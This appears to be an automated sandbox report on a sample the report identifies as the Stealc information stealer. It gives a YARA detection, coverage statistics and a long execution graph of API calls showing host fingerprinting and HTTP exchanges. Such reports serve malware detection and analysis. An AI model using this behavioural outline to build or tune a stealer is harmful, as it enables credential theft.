                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true


                    Execution Graph

                    Execution Coverage:8.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.7%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:24
14377 3b3eec 14376->14377 14378 3b45c0 2 API calls 14377->14378 14379 3b3f05 14378->14379 14380 3b45c0 2 API calls 14379->14380 14381 3b3f1e 14380->14381 14382 3b45c0 2 API calls 14381->14382 14383 3b3f37 14382->14383 14384 3b45c0 2 API calls 14383->14384 14385 3b3f50 14384->14385 14386 3b45c0 2 API calls 14385->14386 14387 3b3f69 14386->14387 14388 3b45c0 2 API calls 14387->14388 14389 3b3f82 14388->14389 14390 3b45c0 2 API calls 14389->14390 14391 3b3f9b 14390->14391 14392 3b45c0 2 API calls 14391->14392 14393 3b3fb4 14392->14393 14394 3b45c0 2 API calls 14393->14394 14395 3b3fcd 14394->14395 14396 3b45c0 2 API calls 14395->14396 14397 3b3fe6 14396->14397 14398 3b45c0 2 API calls 14397->14398 14399 3b3fff 14398->14399 14400 3b45c0 2 API calls 14399->14400 14401 3b4018 14400->14401 14402 3b45c0 2 API calls 14401->14402 14403 3b4031 14402->14403 14404 3b45c0 2 API calls 14403->14404 14405 3b404a 14404->14405 14406 3b45c0 2 API calls 14405->14406 14407 3b4063 14406->14407 14408 3b45c0 2 API calls 14407->14408 14409 3b407c 14408->14409 14410 3b45c0 2 API calls 14409->14410 14411 3b4095 14410->14411 14412 3b45c0 2 API calls 14411->14412 14413 3b40ae 14412->14413 14414 3b45c0 2 API calls 14413->14414 14415 3b40c7 14414->14415 14416 3b45c0 2 API calls 14415->14416 14417 3b40e0 14416->14417 14418 3b45c0 2 API calls 14417->14418 14419 3b40f9 14418->14419 14420 3b45c0 2 API calls 14419->14420 14421 3b4112 14420->14421 14422 3b45c0 2 API calls 14421->14422 14423 3b412b 14422->14423 14424 3b45c0 2 API calls 14423->14424 14425 3b4144 14424->14425 14426 3b45c0 2 API calls 14425->14426 14427 3b415d 14426->14427 14428 3b45c0 2 API calls 14427->14428 14429 3b4176 14428->14429 14430 3b45c0 2 API calls 14429->14430 14431 3b418f 14430->14431 14432 3b45c0 2 API calls 14431->14432 14433 3b41a8 14432->14433 14434 3b45c0 2 API calls 14433->14434 14435 3b41c1 14434->14435 14436 3b45c0 2 API calls 14435->14436 14437 3b41da 14436->14437 14438 3b45c0 2 API calls 14437->14438 14439 3b41f3 
14438->14439 14440 3b45c0 2 API calls 14439->14440 14441 3b420c 14440->14441 14442 3b45c0 2 API calls 14441->14442 14443 3b4225 14442->14443 14444 3b45c0 2 API calls 14443->14444 14445 3b423e 14444->14445 14446 3b45c0 2 API calls 14445->14446 14447 3b4257 14446->14447 14448 3b45c0 2 API calls 14447->14448 14449 3b4270 14448->14449 14450 3b45c0 2 API calls 14449->14450 14451 3b4289 14450->14451 14452 3b45c0 2 API calls 14451->14452 14453 3b42a2 14452->14453 14454 3b45c0 2 API calls 14453->14454 14455 3b42bb 14454->14455 14456 3b45c0 2 API calls 14455->14456 14457 3b42d4 14456->14457 14458 3b45c0 2 API calls 14457->14458 14459 3b42ed 14458->14459 14460 3b45c0 2 API calls 14459->14460 14461 3b4306 14460->14461 14462 3b45c0 2 API calls 14461->14462 14463 3b431f 14462->14463 14464 3b45c0 2 API calls 14463->14464 14465 3b4338 14464->14465 14466 3b45c0 2 API calls 14465->14466 14467 3b4351 14466->14467 14468 3b45c0 2 API calls 14467->14468 14469 3b436a 14468->14469 14470 3b45c0 2 API calls 14469->14470 14471 3b4383 14470->14471 14472 3b45c0 2 API calls 14471->14472 14473 3b439c 14472->14473 14474 3b45c0 2 API calls 14473->14474 14475 3b43b5 14474->14475 14476 3b45c0 2 API calls 14475->14476 14477 3b43ce 14476->14477 14478 3b45c0 2 API calls 14477->14478 14479 3b43e7 14478->14479 14480 3b45c0 2 API calls 14479->14480 14481 3b4400 14480->14481 14482 3b45c0 2 API calls 14481->14482 14483 3b4419 14482->14483 14484 3b45c0 2 API calls 14483->14484 14485 3b4432 14484->14485 14486 3b45c0 2 API calls 14485->14486 14487 3b444b 14486->14487 14488 3b45c0 2 API calls 14487->14488 14489 3b4464 14488->14489 14490 3b45c0 2 API calls 14489->14490 14491 3b447d 14490->14491 14492 3b45c0 2 API calls 14491->14492 14493 3b4496 14492->14493 14494 3b45c0 2 API calls 14493->14494 14495 3b44af 14494->14495 14496 3b45c0 2 API calls 14495->14496 14497 3b44c8 14496->14497 14498 3b45c0 2 API calls 14497->14498 14499 3b44e1 14498->14499 14500 3b45c0 2 API calls 14499->14500 14501 3b44fa 14500->14501 
14502 3b45c0 2 API calls 14501->14502 14503 3b4513 14502->14503 14504 3b45c0 2 API calls 14503->14504 14505 3b452c 14504->14505 14506 3b45c0 2 API calls 14505->14506 14507 3b4545 14506->14507 14508 3b45c0 2 API calls 14507->14508 14509 3b455e 14508->14509 14510 3b45c0 2 API calls 14509->14510 14511 3b4577 14510->14511 14512 3b45c0 2 API calls 14511->14512 14513 3b4590 14512->14513 14514 3b45c0 2 API calls 14513->14514 14515 3b45a9 14514->14515 14516 3c9c10 14515->14516 14517 3ca036 8 API calls 14516->14517 14518 3c9c20 43 API calls 14516->14518 14519 3ca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14517->14519 14520 3ca146 14517->14520 14518->14517 14519->14520 14521 3ca216 14520->14521 14522 3ca153 8 API calls 14520->14522 14523 3ca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14521->14523 14524 3ca298 14521->14524 14522->14521 14523->14524 14525 3ca2a5 6 API calls 14524->14525 14526 3ca337 14524->14526 14525->14526 14527 3ca41f 14526->14527 14528 3ca344 9 API calls 14526->14528 14529 3ca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14527->14529 14530 3ca4a2 14527->14530 14528->14527 14529->14530 14531 3ca4dc 14530->14531 14532 3ca4ab GetProcAddress GetProcAddress 14530->14532 14533 3ca515 14531->14533 14534 3ca4e5 GetProcAddress GetProcAddress 14531->14534 14532->14531 14535 3ca612 14533->14535 14536 3ca522 10 API calls 14533->14536 14534->14533 14537 3ca67d 14535->14537 14538 3ca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14538 14536->14535 14539 3ca69e 14537->14539 14540 3ca686 GetProcAddress 14537->14540 14538->14537 14541 3c5ca3 14539->14541 14542 3ca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14539->14542 14540->14539 14543 3b1590 14541->14543 14542->14541 15664 3b1670 14543->15664 14546 3ca7a0 lstrcpy 14547 3b15b5 14546->14547 14548 3ca7a0 lstrcpy 14547->14548 14549 3b15c7 14548->14549 14550 3ca7a0 lstrcpy 
14549->14550 14551 3b15d9 14550->14551 14552 3ca7a0 lstrcpy 14551->14552 14553 3b1663 14552->14553 14554 3c5510 14553->14554 14555 3c5521 14554->14555 14556 3ca820 2 API calls 14555->14556 14557 3c552e 14556->14557 14558 3ca820 2 API calls 14557->14558 14559 3c553b 14558->14559 14560 3ca820 2 API calls 14559->14560 14561 3c5548 14560->14561 14562 3ca740 lstrcpy 14561->14562 14563 3c5555 14562->14563 14564 3ca740 lstrcpy 14563->14564 14565 3c5562 14564->14565 14566 3ca740 lstrcpy 14565->14566 14567 3c556f 14566->14567 14568 3ca740 lstrcpy 14567->14568 14583 3c557c 14568->14583 14569 3ca740 lstrcpy 14569->14583 14570 3ca7a0 lstrcpy 14570->14583 14571 3c5643 StrCmpCA 14571->14583 14572 3c56a0 StrCmpCA 14573 3c57dc 14572->14573 14572->14583 14574 3ca8a0 lstrcpy 14573->14574 14575 3c57e8 14574->14575 14577 3ca820 2 API calls 14575->14577 14576 3ca820 lstrlen lstrcpy 14576->14583 14578 3c57f6 14577->14578 14581 3ca820 2 API calls 14578->14581 14579 3c5856 StrCmpCA 14582 3c5991 14579->14582 14579->14583 14580 3c51f0 20 API calls 14580->14583 14584 3c5805 14581->14584 14585 3ca8a0 lstrcpy 14582->14585 14583->14569 14583->14570 14583->14571 14583->14572 14583->14576 14583->14579 14583->14580 14587 3b1590 lstrcpy 14583->14587 14591 3c5a0b StrCmpCA 14583->14591 14592 3c52c0 25 API calls 14583->14592 14598 3ca8a0 lstrcpy 14583->14598 14604 3c578a StrCmpCA 14583->14604 14607 3c593f StrCmpCA 14583->14607 14586 3b1670 lstrcpy 14584->14586 14588 3c599d 14585->14588 14608 3c5811 14586->14608 14587->14583 14589 3ca820 2 API calls 14588->14589 14590 3c59ab 14589->14590 14593 3ca820 2 API calls 14590->14593 14594 3c5a28 14591->14594 14595 3c5a16 Sleep 14591->14595 14592->14583 14596 3c59ba 14593->14596 14597 3ca8a0 lstrcpy 14594->14597 14595->14583 14599 3b1670 lstrcpy 14596->14599 14600 3c5a34 14597->14600 14598->14583 14599->14608 14601 3ca820 2 API calls 14600->14601 14602 3c5a43 14601->14602 14603 3ca820 2 API calls 14602->14603 14605 3c5a52 14603->14605 14604->14583 14606 3b1670 
lstrcpy 14605->14606 14606->14608 14607->14583 14608->13661 14610 3c754c 14609->14610 14611 3c7553 GetVolumeInformationA 14609->14611 14610->14611 14615 3c7591 14611->14615 14612 3c75fc GetProcessHeap RtlAllocateHeap 14613 3c7628 wsprintfA 14612->14613 14614 3c7619 14612->14614 14617 3ca740 lstrcpy 14613->14617 14616 3ca740 lstrcpy 14614->14616 14615->14612 14618 3c5da7 14616->14618 14617->14618 14618->13682 14620 3ca7a0 lstrcpy 14619->14620 14621 3b4899 14620->14621 15673 3b47b0 14621->15673 14623 3b48a5 14624 3ca740 lstrcpy 14623->14624 14625 3b48d7 14624->14625 14626 3ca740 lstrcpy 14625->14626 14627 3b48e4 14626->14627 14628 3ca740 lstrcpy 14627->14628 14629 3b48f1 14628->14629 14630 3ca740 lstrcpy 14629->14630 14631 3b48fe 14630->14631 14632 3ca740 lstrcpy 14631->14632 14633 3b490b InternetOpenA StrCmpCA 14632->14633 14634 3b4944 14633->14634 14635 3b4ecb InternetCloseHandle 14634->14635 15679 3c8b60 14634->15679 14636 3b4ee8 14635->14636 15694 3b9ac0 CryptStringToBinaryA 14636->15694 14638 3b4963 15687 3ca920 14638->15687 14641 3b4976 14643 3ca8a0 lstrcpy 14641->14643 14648 3b497f 14643->14648 14644 3ca820 2 API calls 14645 3b4f05 14644->14645 14647 3ca9b0 4 API calls 14645->14647 14646 3b4f27 codecvt 14650 3ca7a0 lstrcpy 14646->14650 14649 3b4f1b 14647->14649 14652 3ca9b0 4 API calls 14648->14652 14651 3ca8a0 lstrcpy 14649->14651 14663 3b4f57 14650->14663 14651->14646 14653 3b49a9 14652->14653 14654 3ca8a0 lstrcpy 14653->14654 14655 3b49b2 14654->14655 14656 3ca9b0 4 API calls 14655->14656 14657 3b49d1 14656->14657 14658 3ca8a0 lstrcpy 14657->14658 14659 3b49da 14658->14659 14660 3ca920 3 API calls 14659->14660 14661 3b49f8 14660->14661 14662 3ca8a0 lstrcpy 14661->14662 14664 3b4a01 14662->14664 14663->13685 14665 3ca9b0 4 API calls 14664->14665 14666 3b4a20 14665->14666 14667 3ca8a0 lstrcpy 14666->14667 14668 3b4a29 14667->14668 14669 3ca9b0 4 API calls 14668->14669 14670 3b4a48 14669->14670 14671 3ca8a0 lstrcpy 14670->14671 14672 3b4a51 14671->14672 14673 
3ca9b0 4 API calls 14672->14673 14674 3b4a7d 14673->14674 14675 3ca920 3 API calls 14674->14675 14676 3b4a84 14675->14676 14677 3ca8a0 lstrcpy 14676->14677 14678 3b4a8d 14677->14678 14679 3b4aa3 InternetConnectA 14678->14679 14679->14635 14680 3b4ad3 HttpOpenRequestA 14679->14680 14682 3b4b28 14680->14682 14683 3b4ebe InternetCloseHandle 14680->14683 14684 3ca9b0 4 API calls 14682->14684 14683->14635 14685 3b4b3c 14684->14685 14686 3ca8a0 lstrcpy 14685->14686 14687 3b4b45 14686->14687 14688 3ca920 3 API calls 14687->14688 14689 3b4b63 14688->14689 14690 3ca8a0 lstrcpy 14689->14690 14691 3b4b6c 14690->14691 14692 3ca9b0 4 API calls 14691->14692 14693 3b4b8b 14692->14693 14694 3ca8a0 lstrcpy 14693->14694 14695 3b4b94 14694->14695 14696 3ca9b0 4 API calls 14695->14696 14697 3b4bb5 14696->14697 14698 3ca8a0 lstrcpy 14697->14698 14699 3b4bbe 14698->14699 14700 3ca9b0 4 API calls 14699->14700 14701 3b4bde 14700->14701 14702 3ca8a0 lstrcpy 14701->14702 14703 3b4be7 14702->14703 14704 3ca9b0 4 API calls 14703->14704 14705 3b4c06 14704->14705 14706 3ca8a0 lstrcpy 14705->14706 14707 3b4c0f 14706->14707 14708 3ca920 3 API calls 14707->14708 14709 3b4c2d 14708->14709 14710 3ca8a0 lstrcpy 14709->14710 14711 3b4c36 14710->14711 14712 3ca9b0 4 API calls 14711->14712 14713 3b4c55 14712->14713 14714 3ca8a0 lstrcpy 14713->14714 14715 3b4c5e 14714->14715 14716 3ca9b0 4 API calls 14715->14716 14717 3b4c7d 14716->14717 14718 3ca8a0 lstrcpy 14717->14718 14719 3b4c86 14718->14719 14720 3ca920 3 API calls 14719->14720 14721 3b4ca4 14720->14721 14722 3ca8a0 lstrcpy 14721->14722 14723 3b4cad 14722->14723 14724 3ca9b0 4 API calls 14723->14724 14725 3b4ccc 14724->14725 14726 3ca8a0 lstrcpy 14725->14726 14727 3b4cd5 14726->14727 14728 3ca9b0 4 API calls 14727->14728 14729 3b4cf6 14728->14729 14730 3ca8a0 lstrcpy 14729->14730 14731 3b4cff 14730->14731 14732 3ca9b0 4 API calls 14731->14732 14733 3b4d1f 14732->14733 14734 3ca8a0 lstrcpy 14733->14734 14735 3b4d28 14734->14735 14736 3ca9b0 4 API 
calls 14735->14736 14737 3b4d47 14736->14737 14738 3ca8a0 lstrcpy 14737->14738 14739 3b4d50 14738->14739 14740 3ca920 3 API calls 14739->14740 14741 3b4d6e 14740->14741 14742 3ca8a0 lstrcpy 14741->14742 14743 3b4d77 14742->14743 14744 3ca740 lstrcpy 14743->14744 14745 3b4d92 14744->14745 14746 3ca920 3 API calls 14745->14746 14747 3b4db3 14746->14747 14748 3ca920 3 API calls 14747->14748 14749 3b4dba 14748->14749 14750 3ca8a0 lstrcpy 14749->14750 14751 3b4dc6 14750->14751 14752 3b4de7 lstrlen 14751->14752 14753 3b4dfa 14752->14753 14754 3b4e03 lstrlen 14753->14754 15693 3caad0 14754->15693 14756 3b4e13 HttpSendRequestA 14757 3b4e32 InternetReadFile 14756->14757 14758 3b4e67 InternetCloseHandle 14757->14758 14763 3b4e5e 14757->14763 14761 3ca800 14758->14761 14760 3ca9b0 4 API calls 14760->14763 14761->14683 14762 3ca8a0 lstrcpy 14762->14763 14763->14757 14763->14758 14763->14760 14763->14762 15700 3caad0 14764->15700 14766 3c17c4 StrCmpCA 14767 3c17cf ExitProcess 14766->14767 14768 3c17d7 14766->14768 14769 3c19c2 14768->14769 14770 3c185d StrCmpCA 14768->14770 14771 3c187f StrCmpCA 14768->14771 14772 3c1970 StrCmpCA 14768->14772 14773 3c18f1 StrCmpCA 14768->14773 14774 3c1951 StrCmpCA 14768->14774 14775 3c1932 StrCmpCA 14768->14775 14776 3c1913 StrCmpCA 14768->14776 14777 3c18ad StrCmpCA 14768->14777 14778 3c18cf StrCmpCA 14768->14778 14779 3ca820 lstrlen lstrcpy 14768->14779 14769->13687 14770->14768 14771->14768 14772->14768 14773->14768 14774->14768 14775->14768 14776->14768 14777->14768 14778->14768 14779->14768 14781 3ca7a0 lstrcpy 14780->14781 14782 3b5979 14781->14782 14783 3b47b0 2 API calls 14782->14783 14784 3b5985 14783->14784 14785 3ca740 lstrcpy 14784->14785 14786 3b59ba 14785->14786 14787 3ca740 lstrcpy 14786->14787 14788 3b59c7 14787->14788 14789 3ca740 lstrcpy 14788->14789 14790 3b59d4 14789->14790 14791 3ca740 lstrcpy 14790->14791 14792 3b59e1 14791->14792 14793 3ca740 lstrcpy 14792->14793 14794 3b59ee InternetOpenA StrCmpCA 14793->14794 14795 
3b5a1d 14794->14795 14796 3b5fc3 InternetCloseHandle 14795->14796 14797 3c8b60 3 API calls 14795->14797 14799 3b5fe0 14796->14799 14798 3b5a3c 14797->14798 14800 3ca920 3 API calls 14798->14800 14801 3b9ac0 4 API calls 14799->14801 14802 3b5a4f 14800->14802 14803 3b5fe6 14801->14803 14804 3ca8a0 lstrcpy 14802->14804 14805 3ca820 2 API calls 14803->14805 14807 3b601f codecvt 14803->14807 14809 3b5a58 14804->14809 14806 3b5ffd 14805->14806 14808 3ca9b0 4 API calls 14806->14808 14811 3ca7a0 lstrcpy 14807->14811 14810 3b6013 14808->14810 14813 3ca9b0 4 API calls 14809->14813 14812 3ca8a0 lstrcpy 14810->14812 14821 3b604f 14811->14821 14812->14807 14814 3b5a82 14813->14814 14815 3ca8a0 lstrcpy 14814->14815 14816 3b5a8b 14815->14816 14817 3ca9b0 4 API calls 14816->14817 14818 3b5aaa 14817->14818 14819 3ca8a0 lstrcpy 14818->14819 14820 3b5ab3 14819->14820 14822 3ca920 3 API calls 14820->14822 14821->13693 14823 3b5ad1 14822->14823 14824 3ca8a0 lstrcpy 14823->14824 14825 3b5ada 14824->14825 14826 3ca9b0 4 API calls 14825->14826 14827 3b5af9 14826->14827 14828 3ca8a0 lstrcpy 14827->14828 14829 3b5b02 14828->14829 14830 3ca9b0 4 API calls 14829->14830 14831 3b5b21 14830->14831 14832 3ca8a0 lstrcpy 14831->14832 14833 3b5b2a 14832->14833 14834 3ca9b0 4 API calls 14833->14834 14835 3b5b56 14834->14835 14836 3ca920 3 API calls 14835->14836 14837 3b5b5d 14836->14837 14838 3ca8a0 lstrcpy 14837->14838 14839 3b5b66 14838->14839 14840 3b5b7c InternetConnectA 14839->14840 14840->14796 14841 3b5bac HttpOpenRequestA 14840->14841 14843 3b5c0b 14841->14843 14844 3b5fb6 InternetCloseHandle 14841->14844 14845 3ca9b0 4 API calls 14843->14845 14844->14796 14846 3b5c1f 14845->14846 14847 3ca8a0 lstrcpy 14846->14847 14848 3b5c28 14847->14848 14849 3ca920 3 API calls 14848->14849 14850 3b5c46 14849->14850 14851 3ca8a0 lstrcpy 14850->14851 14852 3b5c4f 14851->14852 14853 3ca9b0 4 API calls 14852->14853 14854 3b5c6e 14853->14854 14855 3ca8a0 lstrcpy 14854->14855 14856 3b5c77 14855->14856 14857 
3ca9b0 4 API calls 14856->14857 14858 3b5c98 14857->14858 14859 3ca8a0 lstrcpy 14858->14859 14860 3b5ca1 14859->14860 14861 3ca9b0 4 API calls 14860->14861 14862 3b5cc1 14861->14862 14863 3ca8a0 lstrcpy 14862->14863 14864 3b5cca 14863->14864 14865 3ca9b0 4 API calls 14864->14865 14866 3b5ce9 14865->14866 14867 3ca8a0 lstrcpy 14866->14867 14868 3b5cf2 14867->14868 14869 3ca920 3 API calls 14868->14869 14870 3b5d10 14869->14870 14871 3ca8a0 lstrcpy 14870->14871 14872 3b5d19 14871->14872 14873 3ca9b0 4 API calls 14872->14873 14874 3b5d38 14873->14874 14875 3ca8a0 lstrcpy 14874->14875 14876 3b5d41 14875->14876 14877 3ca9b0 4 API calls 14876->14877 14878 3b5d60 14877->14878 14879 3ca8a0 lstrcpy 14878->14879 14880 3b5d69 14879->14880 14881 3ca920 3 API calls 14880->14881 14882 3b5d87 14881->14882 14883 3ca8a0 lstrcpy 14882->14883 14884 3b5d90 14883->14884 14885 3ca9b0 4 API calls 14884->14885 14886 3b5daf 14885->14886 14887 3ca8a0 lstrcpy 14886->14887 14888 3b5db8 14887->14888 14889 3ca9b0 4 API calls 14888->14889 14890 3b5dd9 14889->14890 14891 3ca8a0 lstrcpy 14890->14891 14892 3b5de2 14891->14892 14893 3ca9b0 4 API calls 14892->14893 14894 3b5e02 14893->14894 14895 3ca8a0 lstrcpy 14894->14895 14896 3b5e0b 14895->14896 14897 3ca9b0 4 API calls 14896->14897 14898 3b5e2a 14897->14898 14899 3ca8a0 lstrcpy 14898->14899 14900 3b5e33 14899->14900 14901 3ca920 3 API calls 14900->14901 14902 3b5e54 14901->14902 14903 3ca8a0 lstrcpy 14902->14903 14904 3b5e5d 14903->14904 14905 3b5e70 lstrlen 14904->14905 15701 3caad0 14905->15701 14907 3b5e81 lstrlen GetProcessHeap RtlAllocateHeap 15702 3caad0 14907->15702 14909 3b5eae lstrlen 14910 3b5ebe 14909->14910 14911 3b5ed7 lstrlen 14910->14911 14912 3b5ee7 14911->14912 14913 3b5ef0 lstrlen 14912->14913 14914 3b5f04 14913->14914 14915 3b5f1a lstrlen 14914->14915 15703 3caad0 14915->15703 14917 3b5f2a HttpSendRequestA 14918 3b5f35 InternetReadFile 14917->14918 14919 3b5f6a InternetCloseHandle 14918->14919 14923 3b5f61 14918->14923 
14919->14844 14921 3ca9b0 4 API calls 14921->14923 14922 3ca8a0 lstrcpy 14922->14923 14923->14918 14923->14919 14923->14921 14923->14922 14926 3c1077 14924->14926 14925 3c1151 14925->13695 14926->14925 14927 3ca820 lstrlen lstrcpy 14926->14927 14927->14926 14930 3c0db7 14928->14930 14929 3c0f17 14929->13703 14930->14929 14931 3c0ea4 StrCmpCA 14930->14931 14932 3c0e27 StrCmpCA 14930->14932 14933 3c0e67 StrCmpCA 14930->14933 14934 3ca820 lstrlen lstrcpy 14930->14934 14931->14930 14932->14930 14933->14930 14934->14930 14936 3c0f67 14935->14936 14937 3c0fb2 StrCmpCA 14936->14937 14938 3c1044 14936->14938 14939 3ca820 lstrlen lstrcpy 14936->14939 14937->14936 14938->13711 14939->14936 14941 3ca740 lstrcpy 14940->14941 14942 3c1a26 14941->14942 14943 3ca9b0 4 API calls 14942->14943 14944 3c1a37 14943->14944 14945 3ca8a0 lstrcpy 14944->14945 14946 3c1a40 14945->14946 14947 3ca9b0 4 API calls 14946->14947 14948 3c1a5b 14947->14948 14949 3ca8a0 lstrcpy 14948->14949 14950 3c1a64 14949->14950 14951 3ca9b0 4 API calls 14950->14951 14952 3c1a7d 14951->14952 14953 3ca8a0 lstrcpy 14952->14953 14954 3c1a86 14953->14954 14955 3ca9b0 4 API calls 14954->14955 14956 3c1aa1 14955->14956 14957 3ca8a0 lstrcpy 14956->14957 14958 3c1aaa 14957->14958 14959 3ca9b0 4 API calls 14958->14959 14960 3c1ac3 14959->14960 14961 3ca8a0 lstrcpy 14960->14961 14962 3c1acc 14961->14962 14963 3ca9b0 4 API calls 14962->14963 14964 3c1ae7 14963->14964 14965 3ca8a0 lstrcpy 14964->14965 14966 3c1af0 14965->14966 14967 3ca9b0 4 API calls 14966->14967 14968 3c1b09 14967->14968 14969 3ca8a0 lstrcpy 14968->14969 14970 3c1b12 14969->14970 14971 3ca9b0 4 API calls 14970->14971 14972 3c1b2d 14971->14972 14973 3ca8a0 lstrcpy 14972->14973 14974 3c1b36 14973->14974 14975 3ca9b0 4 API calls 14974->14975 14976 3c1b4f 14975->14976 14977 3ca8a0 lstrcpy 14976->14977 14978 3c1b58 14977->14978 14979 3ca9b0 4 API calls 14978->14979 14980 3c1b76 14979->14980 14981 3ca8a0 lstrcpy 14980->14981 14982 3c1b7f 14981->14982 14983 
3c7500 6 API calls 14982->14983 14984 3c1b96 14983->14984 14985 3ca920 3 API calls 14984->14985 14986 3c1ba9 14985->14986 14987 3ca8a0 lstrcpy 14986->14987 14988 3c1bb2 14987->14988 14989 3ca9b0 4 API calls 14988->14989 14990 3c1bdc 14989->14990 14991 3ca8a0 lstrcpy 14990->14991 14992 3c1be5 14991->14992 14993 3ca9b0 4 API calls 14992->14993 14994 3c1c05 14993->14994 14995 3ca8a0 lstrcpy 14994->14995 14996 3c1c0e 14995->14996 15704 3c7690 GetProcessHeap RtlAllocateHeap 14996->15704 14999 3ca9b0 4 API calls 15000 3c1c2e 14999->15000 15001 3ca8a0 lstrcpy 15000->15001 15002 3c1c37 15001->15002 15003 3ca9b0 4 API calls 15002->15003 15004 3c1c56 15003->15004 15005 3ca8a0 lstrcpy 15004->15005 15006 3c1c5f 15005->15006 15007 3ca9b0 4 API calls 15006->15007 15008 3c1c80 15007->15008 15009 3ca8a0 lstrcpy 15008->15009 15010 3c1c89 15009->15010 15711 3c77c0 GetCurrentProcess IsWow64Process 15010->15711 15013 3ca9b0 4 API calls 15014 3c1ca9 15013->15014 15015 3ca8a0 lstrcpy 15014->15015 15016 3c1cb2 15015->15016 15017 3ca9b0 4 API calls 15016->15017 15018 3c1cd1 15017->15018 15019 3ca8a0 lstrcpy 15018->15019 15020 3c1cda 15019->15020 15021 3ca9b0 4 API calls 15020->15021 15022 3c1cfb 15021->15022 15023 3ca8a0 lstrcpy 15022->15023 15024 3c1d04 15023->15024 15025 3c7850 3 API calls 15024->15025 15026 3c1d14 15025->15026 15027 3ca9b0 4 API calls 15026->15027 15028 3c1d24 15027->15028 15029 3ca8a0 lstrcpy 15028->15029 15030 3c1d2d 15029->15030 15031 3ca9b0 4 API calls 15030->15031 15032 3c1d4c 15031->15032 15033 3ca8a0 lstrcpy 15032->15033 15034 3c1d55 15033->15034 15035 3ca9b0 4 API calls 15034->15035 15036 3c1d75 15035->15036 15037 3ca8a0 lstrcpy 15036->15037 15038 3c1d7e 15037->15038 15039 3c78e0 3 API calls 15038->15039 15040 3c1d8e 15039->15040 15041 3ca9b0 4 API calls 15040->15041 15042 3c1d9e 15041->15042 15043 3ca8a0 lstrcpy 15042->15043 15044 3c1da7 15043->15044 15045 3ca9b0 4 API calls 15044->15045 15046 3c1dc6 15045->15046 15047 3ca8a0 lstrcpy 15046->15047 15048 3c1dcf 
15047->15048 15049 3ca9b0 4 API calls 15048->15049 15050 3c1df0 15049->15050 15051 3ca8a0 lstrcpy 15050->15051 15052 3c1df9 15051->15052 15713 3c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15052->15713 15055 3ca9b0 4 API calls 15056 3c1e19 15055->15056 15057 3ca8a0 lstrcpy 15056->15057 15058 3c1e22 15057->15058 15059 3ca9b0 4 API calls 15058->15059 15060 3c1e41 15059->15060 15061 3ca8a0 lstrcpy 15060->15061 15062 3c1e4a 15061->15062 15063 3ca9b0 4 API calls 15062->15063 15064 3c1e6b 15063->15064 15065 3ca8a0 lstrcpy 15064->15065 15066 3c1e74 15065->15066 15715 3c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15066->15715 15069 3ca9b0 4 API calls 15070 3c1e94 15069->15070 15071 3ca8a0 lstrcpy 15070->15071 15072 3c1e9d 15071->15072 15073 3ca9b0 4 API calls 15072->15073 15074 3c1ebc 15073->15074 15075 3ca8a0 lstrcpy 15074->15075 15076 3c1ec5 15075->15076 15077 3ca9b0 4 API calls 15076->15077 15078 3c1ee5 15077->15078 15079 3ca8a0 lstrcpy 15078->15079 15080 3c1eee 15079->15080 15718 3c7b00 GetUserDefaultLocaleName 15080->15718 15083 3ca9b0 4 API calls 15084 3c1f0e 15083->15084 15085 3ca8a0 lstrcpy 15084->15085 15086 3c1f17 15085->15086 15087 3ca9b0 4 API calls 15086->15087 15088 3c1f36 15087->15088 15089 3ca8a0 lstrcpy 15088->15089 15090 3c1f3f 15089->15090 15091 3ca9b0 4 API calls 15090->15091 15092 3c1f60 15091->15092 15093 3ca8a0 lstrcpy 15092->15093 15094 3c1f69 15093->15094 15722 3c7b90 15094->15722 15096 3c1f80 15097 3ca920 3 API calls 15096->15097 15098 3c1f93 15097->15098 15099 3ca8a0 lstrcpy 15098->15099 15100 3c1f9c 15099->15100 15101 3ca9b0 4 API calls 15100->15101 15102 3c1fc6 15101->15102 15103 3ca8a0 lstrcpy 15102->15103 15104 3c1fcf 15103->15104 15105 3ca9b0 4 API calls 15104->15105 15106 3c1fef 15105->15106 15107 3ca8a0 lstrcpy 15106->15107 15108 3c1ff8 15107->15108 15734 3c7d80 GetSystemPowerStatus 15108->15734 15111 3ca9b0 4 API calls 15112 3c2018 15111->15112 15113 3ca8a0 lstrcpy 15112->15113 15114 3c2021 15113->15114 15115 
3ca9b0 4 API calls 15114->15115 15116 3c2040 15115->15116 15117 3ca8a0 lstrcpy 15116->15117 15118 3c2049 15117->15118 15119 3ca9b0 4 API calls 15118->15119 15120 3c206a 15119->15120 15121 3ca8a0 lstrcpy 15120->15121 15122 3c2073 15121->15122 15123 3c207e GetCurrentProcessId 15122->15123 15736 3c9470 OpenProcess 15123->15736 15126 3ca920 3 API calls 15127 3c20a4 15126->15127 15128 3ca8a0 lstrcpy 15127->15128 15129 3c20ad 15128->15129 15130 3ca9b0 4 API calls 15129->15130 15131 3c20d7 15130->15131 15132 3ca8a0 lstrcpy 15131->15132 15133 3c20e0 15132->15133 15134 3ca9b0 4 API calls 15133->15134 15135 3c2100 15134->15135 15136 3ca8a0 lstrcpy 15135->15136 15137 3c2109 15136->15137 15741 3c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15137->15741 15140 3ca9b0 4 API calls 15141 3c2129 15140->15141 15142 3ca8a0 lstrcpy 15141->15142 15143 3c2132 15142->15143 15144 3ca9b0 4 API calls 15143->15144 15145 3c2151 15144->15145 15146 3ca8a0 lstrcpy 15145->15146 15147 3c215a 15146->15147 15148 3ca9b0 4 API calls 15147->15148 15149 3c217b 15148->15149 15150 3ca8a0 lstrcpy 15149->15150 15151 3c2184 15150->15151 15745 3c7f60 15151->15745 15154 3ca9b0 4 API calls 15155 3c21a4 15154->15155 15156 3ca8a0 lstrcpy 15155->15156 15157 3c21ad 15156->15157 15158 3ca9b0 4 API calls 15157->15158 15159 3c21cc 15158->15159 15160 3ca8a0 